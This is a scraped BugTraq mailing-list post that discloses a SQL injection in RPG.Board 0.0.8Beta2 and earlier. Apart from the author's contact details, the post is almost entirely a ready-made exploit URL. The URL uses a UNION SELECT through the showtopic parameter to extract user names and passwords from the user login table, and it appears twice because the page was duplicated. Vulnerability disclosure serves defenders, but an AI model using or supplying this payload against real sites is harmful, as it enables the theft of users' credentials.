BugTraq
Back to list
|
Post reply
RPG.Board <= 0.0.8Beta2 Remote SQL Injection
Sep 26 2008 03:16PM
Guns 0x90 com ar
[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: RPG.Board
[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69
[~] Vulnerability Class: SQL Injection
[~] Exploit:
Register, login and testing exploit..
http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,nu
ll,concat(user,0x3a,pw),null+from+[PREFIX]_userlogin
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: RPG.Board
[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69
[~] Vulnerability Class: SQL Injection
[~] Exploit:
Register, login and testing exploit..
http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,nu
ll,concat(user,0x3a,pw),null+from+[PREFIX]_userlogin
[ reply ]